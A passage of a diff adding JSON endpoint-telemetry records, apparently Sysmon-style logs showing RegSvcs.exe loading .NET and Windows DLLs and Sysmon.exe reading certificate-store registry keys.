"timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "mscoreei.dll", + "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\SysWOW64\\shlwapi.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\SysWOW64\\combase.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\SysWOW64\\ucrtbase.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\SysWOW64\\gdi32.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\SysWOW64\\gdi32full.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\SysWOW64\\msvcp_win.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\SysWOW64\\user32.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\SysWOW64\\win32u.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\SysWOW64\\imm32.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\SysWOW64\\kernel.appcore.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "version.dll", + "image_path": "C:\\Windows\\SysWOW64\\version.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "clr.dll", + "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871050000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "msvcr120_clr0400.dll", + "image_path": "C:\\Windows\\SysWOW64\\msvcr120_clr0400.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871210000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "registry", + "pid": 4, + "process_name": "System", + "process_path": "System", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\Module\\Microsoft.NET/Framework/v4.0.30319", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\Module\\Microsoft.NET/Framework/v4.0.30319/clr.dll", + "registry_value": "clr.dll", + "timestamp": 131883570871210000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" + }, + { + "event_type": "registry", + "pid": 4, + "process_name": "System", + "process_path": "System", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\Module\\Microsoft.NET/Framework/v4.0.30319/clr.dll\\\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework\\v4.0.30319", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\Module\\Microsoft.NET/Framework/v4.0.30319/clr.dll\\\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "registry_value": "RegSvcs.exe", + "timestamp": 131883570871210000, + "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" + }, + { + "event_type": "image_load", + "image_name": "mscorlib.ni.dll", + "image_path": "C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\6715dc4d04e35f16d482900c355325e9\\mscorlib.ni.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871210000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\SysWOW64\\ole32.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871210000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "clrjit.dll", + "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871210000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\SysWOW64\\oleaut32.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871210000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "System.EnterpriseServices.dll", + "image_path": "C:\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.EnterpriseServices\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.EnterpriseServices.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "System.EnterpriseServices.dll", + "image_path": "C:\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.EnterpriseServices\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.EnterpriseServices.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570871520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570871520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570871520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570871520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570871520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570871520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570871520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570871520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "System.EnterpriseServices.Wrapper.dll", + "image_path": "C:\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.EnterpriseServices\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.EnterpriseServices.Wrapper.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "System.EnterpriseServices.Wrapper.dll", + "image_path": "C:\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.EnterpriseServices\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.EnterpriseServices.Wrapper.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "image_load", + "image_name": "System.EnterpriseServices.Wrapper.dll", + "image_path": "C:\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.EnterpriseServices\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.EnterpriseServices.Wrapper.dll", + "pid": 1976, + "process_name": "RegSvcs.exe", + "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", + "timestamp": 131883570871360000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570871680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570871680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570871680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570871680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570871680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570871680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + 